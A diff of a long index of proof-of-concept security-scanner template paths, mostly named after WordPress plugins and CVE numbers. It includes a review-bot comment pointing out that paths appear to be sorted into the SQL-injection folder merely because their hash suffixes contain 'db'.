./poc/other/newspack-blocks-1b052f452f1bf0c9eb1a71371f42c0e6.yaml
@@ -101989,6 +102167,7 @@
./poc/other/online-estore.yaml
./poc/other/online-grades.yaml
./poc/other/onliner-multiple-bugs.yaml
+./poc/other/onlyoffice-b402953c76f82d1b88842a9ee0c31f2f.yaml
./poc/other/onlyoffice-installer.yaml
./poc/other/onminutes-crm.yaml
./poc/other/oob-param-based-interaction-9251.yaml
@@ -103106,6 +103285,7 @@
./poc/other/photo-gallery.yaml
./poc/other/photo-video-gallery-master-f0f4d695b59538a11f062de52cb08b3a.yaml
./poc/other/photo-video-gallery-master.yaml
+./poc/other/photo-video-store-9887b9e8aa29c789cc721ef3d676a573.yaml
./poc/other/photo_station.yaml
./poc/other/photoblocks-grid-gallery-070e7c21dac14e93cbf5c4592da9e0a2.yaml
./poc/other/photoblocks-grid-gallery-175b78dcaa33f1642305da0ef2e8d7be.yaml
@@ -103282,6 +103462,7 @@
./poc/other/pixgraphy.yaml
./poc/other/pixiv-custom-5d898145396c89d16d93fe047e5b3e70.yaml
./poc/other/pixiv-custom.yaml
+./poc/other/pixobe-cartography-b8d402b7f8267a8fbeabdc06350287fa.yaml
./poc/other/pixova-lite-66ba1859ab560343222a23f4bdd2510b.yaml
./poc/other/pixova-lite-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/pixova-lite.yaml
@@ -103377,6 +103558,7 @@
./poc/other/plg_novana.yaml
./poc/other/pliska-405fe484522342f309e572b6f863f171.yaml
./poc/other/pliska.yaml
+./poc/other/plugin-951ffa4455cde2cf84338c23f5961c7d.yaml
./poc/other/plugin-central-81d9389612a1afe16ac9117292098b3e.yaml
./poc/other/plugin-central-b751676df4d35907e4c217f2ebe354a1.yaml
./poc/other/plugin-central-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -103804,6 +103986,7 @@
./poc/other/post-carousel-ea57fce45364f30b01a71e0b6cc7d73e.yaml
./poc/other/post-carousel-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/post-carousel-plugin.yaml
+./poc/other/post-carousel-slider-for-elementor-7ce3093d4f3e9adea14ad773b3a3df2a.yaml
./poc/other/post-carousel.yaml
./poc/other/post-category-image-with-grid-and-slider-375a5b2c1df41c6d0e13cd16d3e7f19b.yaml
./poc/other/post-category-image-with-grid-and-slider.yaml
@@ -104096,6 +104279,7 @@
./poc/other/powerpack-lite-for-elementor-4ae4b5ba374699fdefe1d0fca67d1b72.yaml
./poc/other/powerpack-lite-for-elementor-801a4fd099de84e12762e37f19f06b41.yaml
./poc/other/powerpack-lite-for-elementor-9729d1323c28fdfde4e709e181d20940.yaml
+./poc/other/powerpack-lite-for-elementor-a7a3589609ae92e0dc1bd8b339906582.yaml
./poc/other/powerpack-lite-for-elementor-f6e2cb44c541528e4bdd396f627b6a7f.yaml
./poc/other/powerpack-lite-for-elementor.yaml
./poc/other/powerpress-1e3d37c0409f287ef569ee57bf8b5111.yaml
@@ -104686,6 +104870,7 @@
./poc/other/publishpress-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/publishpress-plugin.yaml
./poc/other/publishpress.yaml
+./poc/other/pubnews-5b335bb90b570f570873fbfa38b47c5b.yaml
./poc/other/pubsab-malware.yaml
./poc/other/pubsubhubbub-8b9f60491d53b8c8e4056727f71c36e9.yaml
./poc/other/pubsubhubbub.yaml
@@ -105220,6 +105405,7 @@
./poc/other/rancher-panel.yaml
./poc/other/rancher-workflow.yaml
./poc/other/rancher.yaml
+./poc/other/random-banner-0b21c7eea2233a52fab8c4a62c453192.yaml
./poc/other/random-banner-5f9bd55dfb4886d9971e3280798324ec.yaml
./poc/other/random-banner-66e79d43b9bf633ecf7f76918cf8d85b.yaml
./poc/other/random-banner-aa7a1aee86bb07fd299ad157b2709702.yaml
@@ -105305,6 +105491,7 @@
./poc/other/rbsoft-software.yaml
./poc/other/rbxgallery-0afd09d3bebe9f136a82dc448971c35c.yaml
./poc/other/rbxgallery.yaml
+./poc/other/rccp-free-addabdad3f0edc1afcad78dcfe322e09.yaml
./poc/other/rd-wc-order-modifier-95c2fea175252b462658a5ecb1a18747.yaml
./poc/other/rd-wc-order-modifier-983b6e1fd4f4de142422f08e7915e1b6.yaml
./poc/other/rd-wc-order-modifier-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -108054,6 +108241,7 @@
./poc/other/simple-popup-newsletter.yaml
./poc/other/simple-popup-plugin-2bd36fdc29b22dc0d0684dee04b24952.yaml
./poc/other/simple-popup-plugin-5287b8f51d53c1caefc3ecc634903892.yaml
+./poc/other/simple-popup-plugin-cf96f5f0cc1e34ba0f87c5a246e6b6a7.yaml
./poc/other/simple-popup-plugin.yaml
./poc/other/simple-popup.yaml
./poc/other/simple-portfolio-gallery-c823a8c32782388082e34fa9dc4f43bc.yaml
@@ -108240,6 +108428,7 @@
./poc/other/simplepress-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/simplepress-e3965c8d4e66020e113c368a7914c8c3.yaml
./poc/other/simplepress.yaml
+./poc/other/simpleschema-free-d19ba041fbf80d78fb62d140a19bbe1d.yaml
./poc/other/simpleshop-cz-70583275df8a8d66c89e3e54c1e38c92.yaml
./poc/other/simpleshop-cz-995fe677d959107577aa1354e02a9b05.yaml
./poc/other/simpleshop-cz.yaml
@@ -108436,6 +108625,7 @@
./poc/other/sky-elementor-addons-e1e3d7e83d6ee08aac98fd9f64280dd4.yaml
./poc/other/sky-elementor-addons.yaml
./poc/other/sky-phish.yaml
+./poc/other/skyboot-portfolio-gallery-b1da3f38e609312a5083d34cf5925003.yaml
./poc/other/skycaiji-admin-panel-10304.yaml
./poc/other/skycaiji-admin-panel-10305.yaml
./poc/other/skycaiji-admin-panel-10306.yaml
@@ -108665,6 +108855,7 @@
./poc/other/smart-maintenance-mode.yaml
./poc/other/smart-mockups-b1f443189eb688858fd0760beeec94dd.yaml
./poc/other/smart-mockups.yaml
+./poc/other/smart-popup-blaster-30df007059118a37ebbef148c110f5c7.yaml
./poc/other/smart-recent-posts-widget-d88f3f455f89003fa5734c525e70e76b.yaml
./poc/other/smart-recent-posts-widget.yaml
./poc/other/smart-seo-tool-1e322b6ba0f76d96af5775520509b483.yaml
@@ -108845,6 +109036,7 @@
./poc/other/softether-vpn.yaml
./poc/other/softnext-spam-sqr反垃圾邮件系统.yaml
./poc/other/softnext-spam.yaml
+./poc/other/softtemplates-for-elementor-ecddfed759e913087d218b9e237f2c06.yaml
./poc/other/software-integrity-failures.yaml
./poc/other/software-license-manager-02438a90e5cab2e347474ab67e16a2e0.yaml
./poc/other/software-license-manager-08f24ceaa9760ed4a8e1dcab46bbae35.yaml
@@ -108883,6 +109075,7 @@
./poc/other/solarwinds-orion.yaml
./poc/other/solarwinds.yaml
./poc/other/soledad-08fdc0fa4fb6c4def2e2333a78ea6b73.yaml
+./poc/other/soledad-29fa607193cd3b39b09ca02b2ce4f403.yaml
./poc/other/soledad-37b9a8efffbd7fda52057c09793a9115.yaml
./poc/other/soledad-46b9c25417dc1916d1b92681c94a5b3d.yaml
./poc/other/soledad-55ed48a13b9d19cfc1668b1676a5c21b.yaml
@@ -109062,6 +109255,7 @@
./poc/other/spark.yaml
./poc/other/sparkle-demo-importer-7bee5b1af940c855c62dfdccf8baf946.yaml
./poc/other/sparkle-demo-importer.yaml
+./poc/other/sparkle-elementor-kit-4c18bc0aa3ca26a81086e7ea47ef5b19.yaml
./poc/other/sparklestore-236bed5b5a49a6173251e991d6ca44d1.yaml
./poc/other/sparklestore-d2a46afd6d61289094ec49e6cf79a7c7.yaml
./poc/other/sparklestore.yaml
@@ -109209,6 +109403,7 @@
./poc/other/spin360.yaml
./poc/other/spip-install.yaml
./poc/other/spip.yaml
+./poc/other/splash-connector-a408956eb25c0fc5ebb6237dc9efaaab.yaml
./poc/other/splash-rendering-service.yaml
./poc/other/splashscreen-e99cd6f52d6ff45048d4d7eaafac3dec.yaml
./poc/other/splashscreen.yaml
@@ -109982,6 +110177,7 @@
./poc/other/sv-provenexpert.yaml
./poc/other/sv-tracking-manager-cf663949cda235c9ea12aa65dd114d87.yaml
./poc/other/sv-tracking-manager.yaml
+./poc/other/sv100-companion-9407692ccefc1b1607863a7068a9481a.yaml
./poc/other/svg-block-6ffe8bb8705f516ed225e4cda177f560.yaml
./poc/other/svg-block-dc4f23aceeda39e46a3f1145d98bd672.yaml
./poc/other/svg-block.yaml
@@ -110040,6 +110236,7 @@
./poc/other/swift-framework-30d3f5776ed35230993fad52196a3d03.yaml
./poc/other/swift-framework.yaml
./poc/other/swift-performance-lite-03ea7bc0944040c0164e11ef3d52374f.yaml
+./poc/other/swift-performance-lite-9d1b83ae9017d2fadd1702f8770861b6.yaml
./poc/other/swift-performance-lite-ff16d085629ee3b61efab5d02050c62e.yaml
./poc/other/swift-performance-lite.yaml
./poc/other/swifty-bar-55e944853212366688eada78aebb13f0.yaml
@@ -111688,6 +111885,7 @@
./poc/other/twenty20.yaml
./poc/other/twentyfifteen-e9f7cbc36c5c4d5fb72ef5ac394aedde.yaml
./poc/other/twentyfifteen.yaml
+./poc/other/twentytwenty-008f64526c3780ff8f14b386a2edcab8.yaml
./poc/other/twigify-4ae6138a64b6a684977cb2a70738b6dc.yaml
./poc/other/twigify.yaml
./poc/other/twitcasting.yaml
@@ -111736,6 +111934,7 @@
./poc/other/uac-elevate-without-prompt.yaml
./poc/other/uag2100.yaml
./poc/other/uag2100_firmware.yaml
+./poc/other/uber-grid-356fe3fbd1593fabd8654043fb4bf3f8.yaml
./poc/other/uber-grid-98670d29e16e4f4770b4bbde2adf0646.yaml
./poc/other/uber-grid.yaml
./poc/other/uber-phish.yaml
@@ -111918,6 +112117,8 @@
./poc/other/ultimate-classified-listings-7d58dd9b18a638181ffbe094af3eae4d.yaml
./poc/other/ultimate-classified-listings-a55b916c304c51a1b04f17b6dc5ad876.yaml
./poc/other/ultimate-classified-listings.yaml
+./poc/other/ultimate-coming-soon-1b1151732f9e837b52353dea3817cd15.yaml
+./poc/other/ultimate-coming-soon-be5df66158fd08241f78579ea8d369cd.yaml
./poc/other/ultimate-dashboard-2d6c980f1b71a4137c918fd86f88e6b9.yaml
./poc/other/ultimate-dashboard-5faff98325793a73dd67f7cf4ee8d8eb.yaml
./poc/other/ultimate-dashboard-7277279061009a48883dc0e06b350b6d.yaml
@@ -113598,6 +113799,7 @@
./poc/other/watu-1ead06580a956da08d97a649f0788258.yaml
./poc/other/watu-4d628125cd756c9f2c511f4167431a3b.yaml
./poc/other/watu-5c073ba6bf6c7c87161a498fbf10ad3e.yaml
+./poc/other/watu-690d8bcd0e263bad7d88f01f7c626e23.yaml
./poc/other/watu-9062ef8924f40d9755450f4c54d45f3f.yaml
./poc/other/watu-92a420959f8536c6c5dda3bafbacbab3.yaml
./poc/other/watu-9830d337b08b250a99a60ff90962857e.yaml
@@ -114081,6 +114283,7 @@
./poc/other/wip-incoming-lite-cf7facf8e3af34332be0173ed93179a2.yaml
./poc/other/wip-incoming-lite.yaml
./poc/other/wip-woocarousel-lite-58c536c08bbfd58c8c5df3f776075f47.yaml
+./poc/other/wip-woocarousel-lite.yaml
./poc/other/wireclub.yaml
./poc/other/wireguard-preshared.yaml
./poc/other/wireless-access-point-controller.yaml
@@ -114466,6 +114669,7 @@
./poc/other/woo-pdf-invoice-builder-5bd45b3163617189ce7308fb26a11801.yaml
./poc/other/woo-pdf-invoice-builder-71b40029fdfb6655eeea274a86ce417a.yaml
./poc/other/woo-pdf-invoice-builder-843948fd1f1b86a6e7d550c861ad1ed8.yaml
+./poc/other/woo-pdf-invoice-builder-b3d98dd124afa7dc460f57d96fd05347.yaml
./poc/other/woo-pdf-invoice-builder.yaml
./poc/other/woo-pdf-invoices-bulk-download-472842e06756dc17bab4168ce9177b37.yaml
./poc/other/woo-pdf-invoices-bulk-download-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -115180,6 +115384,7 @@
./poc/other/xiuno.yaml
./poc/other/xjhtqy-crm.yaml
./poc/other/xjhyt-system.yaml
+./poc/other/xl-tab-40f41253ca6b22bb907999b982dcace4.yaml
./poc/other/xl-tab-c1541f5d341255cfb7d8669f748f395e.yaml
./poc/other/xl-tab.yaml
./poc/other/xllentech-english-islamic-calendar-1d5b04bee2df8076985b3802622f831c.yaml
@@ -115280,6 +115485,7 @@
./poc/other/yada-wiki-0e04c450c7a6033c90d580fe0890dc93.yaml
./poc/other/yada-wiki.yaml
./poc/other/yahoo-japan-auction.yaml
+./poc/other/yahoo-media-player-6d6ac328025439c4bf1dd52ca758d69c.yaml
./poc/other/yahoo-phish.yaml
./poc/other/yamaps-f9146b05cc50468ff3e1ed6ab1cd8fe0.yaml
./poc/other/yamaps.yaml
@@ -115816,6 +116022,7 @@
./poc/other/zlick-paywall.yaml
./poc/other/zm-gallery.yaml
./poc/other/zmarsacom.yaml
+./poc/other/znajdz-prace-z-pracapl-f64257e15582ca43c7ad0a549fe64fd8.yaml
./poc/other/zoho-campaigns-67bb4e69a169a782467f485fb6cfcf93.yaml
./poc/other/zoho-campaigns-8ef70bd21a986de5c011a40971fa9a78.yaml
./poc/other/zoho-campaigns-cc101221171fc689aa4c8dd1485aaa4d.yaml
@@ -116943,6 +117150,7 @@
./poc/remote_code_execution/account-manager-woocommerce-198aaf82d5ab4648c4ab1ac1d78a7c90.yaml
./poc/remote_code_execution/account-manager-woocommerce.yaml
./poc/remote_code_execution/accounting-for-woocommerce-53b52ac147da254acf1412f550aa0c64.yaml
+./poc/remote_code_execution/accounting-for-woocommerce.yaml
./poc/remote_code_execution/acf-for-woocommerce-product-5f5d0f52c1d912f42f77906eaf762cdd.yaml
./poc/remote_code_execution/acf-for-woocommerce-product-6477bf18cad6c823db485408d49b337b.yaml
./poc/remote_code_execution/acf-for-woocommerce-product.yaml
@@ -118176,6 +118384,7 @@
./poc/remote_code_execution/more-better-reviews-for-woocommerce.yaml
./poc/remote_code_execution/mq-woocommerce-products-price-bulk-edit-1af1bfa2b2a7cb0a9db573b3931a0491.yaml
./poc/remote_code_execution/mq-woocommerce-products-price-bulk-edit.yaml
+./poc/remote_code_execution/multilevel-referral-plugin-for-woocommerce-20b3dc25777d2d4d55cfa2c7a3d7144f.yaml
./poc/remote_code_execution/multiparcels-shipping-for-woocommerce-1076c5f355a65534e72ef51489341d2f.yaml
./poc/remote_code_execution/multiparcels-shipping-for-woocommerce-3dcd3ff11562779966f412aa5b51000d.yaml
./poc/remote_code_execution/multiparcels-shipping-for-woocommerce-522568ff6baf34c6f7bed5d2ee776244.yaml
@@ -118236,10 +118445,12 @@
./poc/remote_code_execution/next-order-coupon-woocommerce-b7c5fef4e19b4435bd19c7ddc442fdea.yaml
./poc/remote_code_execution/next-order-coupon-woocommerce-ff9293ba28748efa2ab9a2fe77385468.yaml
./poc/remote_code_execution/next-order-coupon-woocommerce.yaml
+./poc/remote_code_execution/nextcart-woocommerce-migration-2e2806962d8874bbd69c8d26bf481248.yaml
./poc/remote_code_execution/nginx-webui-rce.yaml
./poc/remote_code_execution/nginxwebui-runcmd-rce.yaml
./poc/remote_code_execution/ni-purchase-orderpo-for-woocommerce-d3a637fd2d20648c0d7b44bd37557752.yaml
./poc/remote_code_execution/ni-purchase-orderpo-for-woocommerce.yaml
+./poc/remote_code_execution/ni-woocommerce-cost-of-goods-66898c5242c9d33ba57cb7fe04ac3a35.yaml
./poc/remote_code_execution/ni-woocommerce-custom-order-status-c82f3bfb0227cd93471796cd6ad7019e.yaml
./poc/remote_code_execution/ni-woocommerce-custom-order-status.yaml
./poc/remote_code_execution/ni-woocommerce-sales-report-8a31f44eb6f99b33cb133332f49866d6.yaml
@@ -119985,6 +120196,7 @@
./poc/remote_code_execution/woocommerce-support-ticket-system-c55b90eb13850c1f21f1569dfb76cac8.yaml
./poc/remote_code_execution/woocommerce-support-ticket-system-f22cd57903a5b9c81a6842d03c2e5a79.yaml
./poc/remote_code_execution/woocommerce-support-ticket-system.yaml
+./poc/remote_code_execution/woocommerce-ultimate-gift-card-f2d90f9b034e1f97969a83011a928867.yaml
./poc/remote_code_execution/woocommerce-upcoming-product-6477bf18cad6c823db485408d49b337b.yaml
./poc/remote_code_execution/woocommerce-upcoming-product-ff9293ba28748efa2ab9a2fe77385468.yaml
./poc/remote_code_execution/woocommerce-upcoming-product.yaml
@@ -121142,6 +121354,7 @@
./poc/search/smartsearchwp.yaml
./poc/search/sort-searchresult-by-title-86feb80f760342151e6b43a07a4c470f.yaml
./poc/search/sort-searchresult-by-title.yaml
+./poc/search/spatialmatch-free-lifestyle-search-67ee26ea0af5450a37293a361423bdd3.yaml
./poc/search/sphinxsearch-config.yaml
./poc/search/sw_ajax_woocommerce_search-5ce78f9939b9150d27f312b9585f1d7a.yaml
./poc/search/sw_ajax_woocommerce_search-c4bf0c010e385ed4f61abcf59a51504f.yaml
@@ -124046,6 +124259,7 @@
./poc/sql/CVE-2024-1080-15318692234db11db0354155dd2f2282.yaml
./poc/sql/CVE-2024-10851-dbe7b5e4e9cfdb363f696ddca5d2335c.yaml
./poc/sql/CVE-2024-10854-dc294b17b7eb8d67dbabdea0e0fccc45.yaml
+./poc/sql/CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml
./poc/sql/CVE-2024-10878-2a6958b657c7efaf0d338a4aea9db038.yaml
./poc/sql/CVE-2024-10890-007744aef7f83fa0ee95dbf3047ac5b2.yaml
./poc/sql/CVE-2024-10899-e69dd2249584b3a0690feee574c3db8b.yaml
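Review bot: The added entry `./poc/sql/CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml` appears to be filed under `poc/sql/` only because its hash suffix contains the letters `db`. Every `poc/sql/` path added in the later hunks of this file (the `capitalize-my-title`, `chatter` and `content-audit-exporter` entries, for example) has `db` somewhere in its hash and nothing in its name that points to SQL injection. The same substring effect looks likely in the `poc/remote_code_execution/` hunks, where each added plugin name contains `woocommerce`, and in the `poc/microsoft/` hunks, where the added names contain `lms` and `forms`. Anyone who picks templates by directory to scope a scan or to build detection coverage will get unrelated checks mixed in, so the category should come from each template's own metadata, or at least from the name with the hash suffix stripped before matching. The script that builds this list is not part of the diff, so this is inferred from the paths alone.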
@@ -124055,8 +124269,10 @@
./poc/sql/CVE-2024-10961-c22c374f4ffe67db892c953e4cf45c93.yaml
./poc/sql/CVE-2024-11088-564fc5eaafcf306cc1db90950bcd86ec.yaml
./poc/sql/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml
+./poc/sql/CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db.yaml
./poc/sql/CVE-2024-1118-d2488e79cdb18e5fa6f4b114e5fd1973.yaml
./poc/sql/CVE-2024-11197-b1a29e2fb93e8f055bb485dbbb4122a8.yaml
+./poc/sql/CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19.yaml
./poc/sql/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml
./poc/sql/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml
./poc/sql/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml
@@ -124072,10 +124288,14 @@
./poc/sql/CVE-2024-11412-b7f9a59e3648736328457db943a1aa23.yaml
./poc/sql/CVE-2024-11438-466e48b3dc4ddb929568c36634c56fb1.yaml
./poc/sql/CVE-2024-11440-b26a27e98ac4778bf1db64f0d89b26d0.yaml
+./poc/sql/CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef.yaml
+./poc/sql/CVE-2024-11450-aa0eea523b63076daf425f6ddb400979.yaml
./poc/sql/CVE-2024-11455-20245b95e832be32aa78c5dcdb250fbb.yaml
./poc/sql/CVE-2024-1158-c524eecd9e35e784bb852f087dadba65.yaml
./poc/sql/CVE-2024-11620-979089a4744c95c4c6431c18c0d453db.yaml
+./poc/sql/CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7.yaml
./poc/sql/CVE-2024-1173-9e9606db29cc691b1619adba347c82df.yaml
+./poc/sql/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml
./poc/sql/CVE-2024-1209-262fb41bb4526e178dfcbc92b07bdb7c.yaml
./poc/sql/CVE-2024-1293-affd9a0551db020dec750cedbcd3816e.yaml
./poc/sql/CVE-2024-1294-dfdb0dbdfc95da5675d873e172a0e0c4.yaml
@@ -124457,6 +124677,7 @@
./poc/sql/CVE-2024-3940-c77e604f97e35956017cf6a68db15f39.yaml
./poc/sql/CVE-2024-3952-e82e7f7b55b1a2cdb9c63c74403002dd.yaml
./poc/sql/CVE-2024-3954-d300f84586929db533ba549a8c5271bc.yaml
+./poc/sql/CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21.yaml
./poc/sql/CVE-2024-39627-4a34ef4adb6554c40e87a30e6b5db2d1.yaml
./poc/sql/CVE-2024-39629-21a0d1e8bc7085b87d4ec991fcdbb5fd.yaml
./poc/sql/CVE-2024-3963-731de2d0a4c69dba27660c9868757277.yaml
@@ -124694,6 +124915,10 @@
./poc/sql/CVE-2024-53719-b4493181ccba3e1197dbf7fce74940cf.yaml
./poc/sql/CVE-2024-53721-b5cfee65491f0247c2f1fdb0949e9d6f.yaml
./poc/sql/CVE-2024-53726-1e919e9d2a69b020a76e46d4db30570d.yaml
+./poc/sql/CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb.yaml
+./poc/sql/CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3.yaml
+./poc/sql/CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0.yaml
+./poc/sql/CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1.yaml
./poc/sql/CVE-2024-5431-241e169fe8d70647db15866852ef1ef7.yaml
./poc/sql/CVE-2024-5441-ac5094c9721ab0d78dbe312bf4fbf927.yaml
./poc/sql/CVE-2024-5459-5fe3da3314db32ae5a24560dc5ca6f8d.yaml
@@ -125550,6 +125775,7 @@
./poc/sql/beescms_v3-login-sql-injection.yaml
./poc/sql/beescms_v4-login-sqli.yaml
./poc/sql/before-and-after-product-images-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml
+./poc/sql/best-addons-for-elementor-bd743f52479cb010ad232ebee7dbf30b.yaml
./poc/sql/best-bootstrap-widgets-for-elementor-aedbca6edd060e8a69fdd7760bb9fe9f.yaml
./poc/sql/betheme-2738eb196d5cf7002027db186214d929.yaml
./poc/sql/betheme-71b13c5e1eda36a90193edb1421a40a0.yaml
@@ -125582,6 +125808,7 @@
./poc/sql/bft-autoresponder-410c06116fe1a48aeddb5876065bb3ed.yaml
./poc/sql/bigcommerce-e42ef8d39a3467d5e1a7baf1b678f8db.yaml
./poc/sql/bigcontact-d285769ee06ff62690a211e623fe0db4.yaml
+./poc/sql/bin-stripe-donation-26be16d9007bef8defcdb810970efcf9.yaml
./poc/sql/bingle-3657db267ffb9fa9585f7dda5be77b5d.yaml
./poc/sql/biometric-login-for-woocommerce-56a06f7ec0c2351c343ea2384b7dbd44.yaml
./poc/sql/bit-form-3d27ce4cf07eddb00a73dc6a8eb2fa2a.yaml
@@ -125761,6 +125988,7 @@
./poc/sql/canvas-85dba4da99018ec5002875cc774204af.yaml
./poc/sql/canvas-cc9db930f569b6837ab5aed1f9582e62.yaml
./poc/sql/canvasio3d-light-afe02b616299fe661a744ebe8dbd9776.yaml
+./poc/sql/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml
./poc/sql/captainform-bd412ac944fb4a7c5600d8dbbfb662bc.yaml
./poc/sql/captcha-d31b1c8c716a9d93fe1fbd75b1dbb125.yaml
./poc/sql/captcha-in-thai-a8aa19e5f73bcebc92ee846ddb45e746.yaml
@@ -125836,6 +126064,7 @@
./poc/sql/chatbot-b038bef7869b3706efa20fdb3d87a82d.yaml
./poc/sql/chatbot-b22ff0dbd98aa4f5a4d08888fadce284.yaml
./poc/sql/chatbot-e59db0430d299064f582993dd5ae7c3b.yaml
+./poc/sql/chatter-50f846e0f4847e28db594b1f3b22c537.yaml
./poc/sql/chaty-54b4df3ad52973902fbee4db2574a283.yaml
./poc/sql/chauffeur-booking-system-47b382c141e0bdf017dbc2d5f6a6abb1.yaml
./poc/sql/cherry-plugin-10e90184e935e318fb6118f56edb0f78.yaml
@@ -125999,6 +126228,7 @@
./poc/sql/contact-us-page-contact-people-34edb96c9ab0661038d2eccd212e324c.yaml
./poc/sql/contact-us-page-contact-people-bfa85b6db67d591aac2f6f71df4a2f6a.yaml
./poc/sql/contact-widgets-for-elementor-6477bf18cad6c823db485408d49b337b.yaml
+./poc/sql/content-audit-exporter-e79372032f3cd9964820840ddb7f0ea3.yaml
./poc/sql/content-aware-sidebars-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/content-grabber-9cd8c8d91245df8880525bdb80e2a804.yaml
./poc/sql/content-protector-19b0cf5ebdbef78878d163d48f84b32e.yaml
@@ -126066,6 +126296,7 @@
./poc/sql/count-per-day-311cd82477fed81bb66239db49d949d3.yaml
./poc/sql/countdown-builder-466d118ca8f9a3617f4ecdb86e11688a.yaml
./poc/sql/countdown-time-d49b34cc4749bcddb6c0d98a35fdb653.yaml
+./poc/sql/countdown-timer-for-elementor-e125cc11edbf54c4514f0c2218a86a07.yaml
./poc/sql/counter-yandex-metrica-c194310014d30316dbbe28440ddf1a9d.yaml
./poc/sql/counterpoint-4e848d0e70e34ae5f5dbfea5a0844aac.yaml
./poc/sql/country-state-city-auto-dropdown-dbb36fa80809f3531c17675200623d4b.yaml
@@ -126100,6 +126331,7 @@
./poc/sql/csz-cms-multiple-blind-sql-injection.yaml
./poc/sql/csz-cms-sqli.yaml
./poc/sql/cuisine-palace-6477bf18cad6c823db485408d49b337b.yaml
+./poc/sql/cultbooking-booking-engine-5eb904d4a3173fdb3278f6a25598e63f.yaml
./poc/sql/currency-switcher-ddbcd2d90a5d069d6e14c0fea6254c46.yaml
./poc/sql/current-template-name-4e0b3f5938dbbcb7b6d25d649232d602.yaml
./poc/sql/curtain-cdf892b1bdb65554becd13f5d97445be.yaml
@@ -127730,6 +127962,7 @@
./poc/sql/myblogu-a759e03a3140ab5da9f810ffbdb3a4c2.yaml
./poc/sql/mybooktable-4ef7dcbfb2a4ff3772362d316ebe9ddb.yaml
./poc/sql/mycred-6477bf18cad6c823db485408d49b337b.yaml
+./poc/sql/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml
./poc/sql/mycred-e577923b04d9cbb1dba64e0256a4900d.yaml
./poc/sql/myriad-e7ede6314c209b97480a8f0916dbaa81.yaml
./poc/sql/mysql-default-login.yaml
@@ -127911,6 +128144,7 @@
./poc/sql/os-our-team-5e9ed8ddbc29a65b56b40fb1593a5b78.yaml
./poc/sql/ota-sync-booking-engine-widget-e6eadc3c1846bf39dbc1745d98cc5942.yaml
./poc/sql/otter-blocks-15c5581c7f12dbec33c590f64d738d01.yaml
+./poc/sql/out-of-stock-badge-824e800865ecf93bf8922dba7aad4e65.yaml
./poc/sql/out-of-stock-display-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/out-of-the-box-528db542bd643fe3ab8026c257a827c4.yaml
./poc/sql/overlay-image-divi-module-6477bf18cad6c823db485408d49b337b.yaml
@@ -127961,6 +128195,7 @@
./poc/sql/payment-gateway-payfabric-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/payment-gateway-stripe-and-woocommerce-integration-988d55592a55e8dbec9b2b183fa815e4.yaml
./poc/sql/payment-gateways-caller-for-wp-e-commerce-149513668ca0531327db1429515bc204.yaml
+./poc/sql/paypal-responder-2bb28c0dbe7d31806c826438ecefef2f.yaml
./poc/sql/payplus-payment-gateway-a3aef2bebedbebc3212e421675dbad01.yaml
./poc/sql/paytium-176f9dc136ebe7ea745156cdb0054554.yaml
./poc/sql/paytium-6bfa7db55abe86e184a7874b8579256d.yaml
@@ -128055,6 +128290,7 @@
./poc/sql/pixgraphy-fd1668db1ee6120d9e9e1b481cd44501.yaml
./poc/sql/pixtypes-38d12a3ee1af1016d763a66f9b3fdb77.yaml
./poc/sql/player-c01dbc3d918342ab9261fcf9f834d00f.yaml
+./poc/sql/plugin-5dcfaa6624128695b8dbff266dad887f.yaml
./poc/sql/plugins-on-steroids-3c5e646c22c4a2ee0780b32e276ba0db.yaml
./poc/sql/pmb-sqli.yaml
./poc/sql/pmpro-ccbill-ca203c1416f8db65ff994af39c261ed6.yaml
@@ -129250,6 +129486,8 @@
./poc/sql/vbulletin-ajaxreg-sqli.yaml
./poc/sql/vbulletin-search-sqli.yaml
./poc/sql/verbalize-wp-d2642c9976dd79a81dbb8a04d84d3984.yaml
+./poc/sql/verowa-connect-e19e41c4fd554c823dba2f39d46b632a.yaml
+./poc/sql/vertical-carousel-slider-02cbab9c2d567c8a51e8bba1e79d8db9.yaml
./poc/sql/viala-db2c68eeb70fb7b246821a2cd4518cb8.yaml
./poc/sql/video-conferencing-with-zoom-api-cada35bdbe5e2a0f3053da42343b771e.yaml
./poc/sql/video-contest-dcdbdb7c718f0791fb8fb1ab6aee662f.yaml
@@ -129927,6 +130165,7 @@
./poc/sql/wp-mail-smtp-pro-bf99af0b560ff84ba93dbeab4c84cecc.yaml
./poc/sql/wp-maintenance-mode-site-under-construction-3f94aced36dbd4328dad691c27a54184.yaml
./poc/sql/wp-media-folder-54aa91e59ecdb8a0126b1e5e8e9c3823.yaml
+./poc/sql/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml
./poc/sql/wp-megamenu-fe36f95770875e296f0157be9db6db9f.yaml
./poc/sql/wp-members-7aa36ba12939bcdb73e6e0450931851d.yaml
./poc/sql/wp-members-8db9f530e08181a4bd6b357664b8db50.yaml
@@ -134208,6 +134447,7 @@
